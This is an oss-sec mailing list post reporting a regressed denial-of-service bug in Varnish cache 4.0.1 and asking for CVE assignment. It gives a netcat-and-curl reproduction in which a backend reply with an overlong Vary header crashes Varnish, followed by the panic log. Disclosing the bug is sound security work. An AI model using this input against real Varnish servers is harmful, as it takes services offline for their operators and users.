oss-sec mailing list archives
Varnish - no CVE == bug regression
From: Marek Kroemeke <kroemeke () gmail com>
Date: Wed, 2 Jul 2014 17:57:01 +0100
Hi there, Latest version of Varnish cache (4.0.1 https://www.varnish-cache.org/ ) has the same DoS vulnerability that 3.x had (which was subsequently fixed in that branch). Any chance to allocate some CVEs for the below so that this doesn't happen again ? http://seclists.org/fulldisclosure/2013/Mar/55 http://seclists.org/fulldisclosure/2013/Mar/61 http://seclists.org/fulldisclosure/2013/Mar/63 http://seclists.org/fulldisclosure/2013/Mar/58 How to replicate (assuming varnish proxies to port 8100) : "HTTP/1.1 200 foo\r\nVary: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n" | nc.traditional -l -p8100 curl http://localhost:6081/ -- cut -- Jul 2 18:32:09 localhost varnishd[6145]: Child (21893) Panic message:#012Assert error in http_GetHdr(), cache/cache_http.c line 347:#012 Condition(l == strlen(hdr + 1)) not true.#012thread = (cache-worker)#012ident = Linux,3.2.0-58-generic,x86_64,-smalloc,-smalloc,-hcritbit,epoll#012Backtrace:#012 0x42fdd9: pan_ic+0x1a0#012 0x426267: http_GetHdr+0x5b#012 0x43a951: VRY_Create+0x375#012 0x41c930: vbf_beresp2obj+0x40#012 0x41e766: vbf_fetch_thread+0x1949#012 0x432b7d: Pool_Work_Thread+0x5e8#012 0x4444da: wrk_thread_real+0xfc#012 0x444698: WRK_thread+0x16#012 0x7f21da3cfe9a: /lib/x86_64-linux-gnu/libpthread.so.0(+0x7e9a) [0x7f21da3cfe9a]#012 0x7f21da0fc3fd: /lib/x86_64-linux-gnu/libc.so.6(clone+0x6d) [0x7f21da0fc3fd]#012 busyobj = 0x7f21a4090a90 {#012 ws = 0x7f21a4090b50 {#012 id = "bo",#012 {s,f,r,e} = {0x7f21a4092a70,+456,(nil),+57376},#012 },#012 refcnt = 2#012 retries = 0#012 failed = 0#012 state = 1#012 is_do_stream#012 is_is_gunzip#012 bodystatus = 4 (eof),#012 },#012 http[bereq] = {#012 ws = 0x7f21a4090b50[bo]#012 "GET",#012 "/",#012 "HTTP/1.1",#012 "User-Agent: curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3",#012 "Host: localhost:6081",#012 "Accept: */*",#012 "X-Forwarded-For: 127.0.0.1",#012 "Accept-Encoding: gzip",#012 "X-Varnish: 3",#012 },#012 http[beresp] = {#012 ws = 0x7f21a4090b50[bo]#012 "HTTP/1.1",#012 "200",#012 "foo",#012 "Vary: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",#012 "Date: Wed, 02 Jul 2014 16:32:07 GMT",#012 },#012 ws = 0x7f21a4090cd8 { BAD_MAGIC(0x00000000) },#012 },#012 objcore (FETCH) = 0x7f2198000950 {#012 refcnt = 2#012 flags = 0x2#012 objhead = 0x7f21980009e0#012 }#012 }#012 -- cut -- regards, AKAT-1 22733db72ab3ed94b5f8a1ffcde850251fe6f466 Marek Kroemeke
Current thread:
- Varnish - no CVE == bug regression Marek Kroemeke (Jul 02)
- Re: Varnish - no CVE == bug regression Solar Designer (Jul 02)
- Re: Varnish - no CVE == bug regression Poul-Henning Kamp (Jul 02)
- Re: Varnish - no CVE == bug regression Marek Kroemeke (Jul 02)
- Re: Varnish - no CVE == bug regression Poul-Henning Kamp (Jul 03)
- Re: Varnish - no CVE == bug regression Kurt Seifried (Jul 03)
- Re: Varnish - no CVE == bug regression Sven Kieske (Jul 03)
- Re: Varnish - no CVE == bug regression Stefan Bühler (Jul 03)
- Re: Varnish - no CVE == bug regression Kurt Seifried (Jul 03)
- Re: Varnish - no CVE == bug regression Marek Kroemeke (Jul 03)
- Re: Varnish - no CVE == bug regression Stefan Bühler (Jul 03)
- Re: Varnish - no CVE == bug regression Poul-Henning Kamp (Jul 02)
- Re: Varnish - no CVE == bug regression Solar Designer (Jul 02)